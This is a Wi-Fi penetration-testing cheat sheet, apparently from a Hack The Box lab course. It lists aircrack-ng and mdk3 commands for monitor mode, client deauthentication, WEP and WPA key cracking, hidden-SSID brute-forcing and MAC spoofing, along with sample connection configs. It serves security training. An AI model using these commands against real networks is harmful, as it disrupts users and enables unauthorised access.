Wi-Fi Penetration Testing Basics

Interfaces and Interface Modes

Command                                                                                  Description
sudo iw reg set US                                                                       Set Region for the Interface.
sudo ifconfig wlan0 down && sudo iwconfig wlan0 txpower 30 && sudo ifconfig wlan0 up     Change the Interface Strength.
iwlist wlan0 scan | grep -E 'Cell|Quality'                                               Scan and display available networks with signal quality.
sudo ifconfig wlan0 down && sudo iwconfig wlan0 channel 64 && sudo ifconfig wlan0 up     Change the Interface Channel.
sudo ifconfig wlan0 down && sudo iwconfig wlan0 freq "5.52G" && sudo ifconfig wlan0 up   Change the Interface Frequency.
sudo ifconfig wlan0 down && sudo iwconfig wlan0 mode managed && sudo ifconfig wlan0 up   Set the Interface to Managed Mode.
sudo iwconfig wlan0 mode ad-hoc && sudo iwconfig wlan0 essid HTB-Mesh                    Set the Interface to Ad-hoc Mode.
sudo iw dev wlan0 set type mesh                                                          Set the Interface to Mesh Mode.
sudo ifconfig wlan0 down && sudo iw wlan0 set monitor control && sudo ifconfig wlan0 up  Set the Interface to Monitor Mode.

Aircrack-ng Essentials

Command                                                              Description
sudo airmon-ng start wlan0                                           Start Monitor mode using airmon-ng.
sudo airmon-ng start wlan0 11                                        Start Monitor mode using airmon-ng on a specific channel.
sudo airodump-ng wlan0mon                                            Scan available Wi-Fi networks using airodump-ng.
sudo airodump-ng -c 11 wlan0mon                                      Scan available Wi-Fi networks on a specific channel.
sudo airodump-ng wlan0mon --band a                                   Scan 5 GHz Wi-Fi bands.
sudo airodump-ng wlan0mon -w HTB                                     Save the airodump-ng output to a file.
airgraph-ng -i HTB-01.csv -g CAPR -o HTB_CAPR.png                    Generate Clients to AP Relationship Graph.
airgraph-ng -i HTB-01.csv -g CPG -o HTB_CPG.png                      Generate Common Probe Graph.
sudo aireplay-ng --test wlan0mon                                     Test for Packet Injection.
aireplay-ng -0 5 -a 00:14:6C:7A:41:81 -c 00:0F:B5:32:31:31 wlan0mon  Perform Deauthentication using Aireplay-ng.
airdecap-ng -w 1234567890ABCDEF HTB-01.cap                           Decrypt WEP-encrypted captures.
aircrack-ng -K HTB.ivs                                               Crack WEP using aircrack-ng.
aircrack-ng HTB.pcap -w /opt/wordlist.txt                            Crack WPA using aircrack-ng.

Connection Methods

WEP Network

network={
    ssid="HackTheBox"
    key_mgmt=NONE
    wep_key0=3C1C3A3BAB
    wep_tx_keyidx=0
}

Save the configuration above as wep.conf, then connect with:

wpa_supplicant -c wep.conf -i wlan0

WPA Personal Network

network={
    ssid="HackMe"
    psk="password123"
}

Save the configuration above as wpa.conf, then connect with:

wpa_supplicant -c wpa.conf -i wlan0

WPA Enterprise Network

network={
    ssid="HTB-Corp"
    key_mgmt=WPA-EAP
    identity="HTB\Administrator"
    password="Admin@123"
}

Save the configuration above as wpa_enterprise.conf, then connect with:

wpa_supplicant -c wpa_enterprise.conf -i wlan0

Basic Control Bypass

Command                                                                                          Description
mdk3 wlan0mon p -b u -c 1 -t A2:FF:31:2C:B1:C4                                                   Brute-force Hidden SSID for all possible values.
mdk3 wlan0mon p -f /opt/wordlist.txt -t D2:A3:32:13:29:D5                                        Brute-force Hidden SSID using a Wordlist.
airmon-ng stop wlan0mon && sudo macchanger wlan0 -m 3E:48:72:B7:62:2A && sudo ifconfig wlan0 up  Change the MAC address of the interface.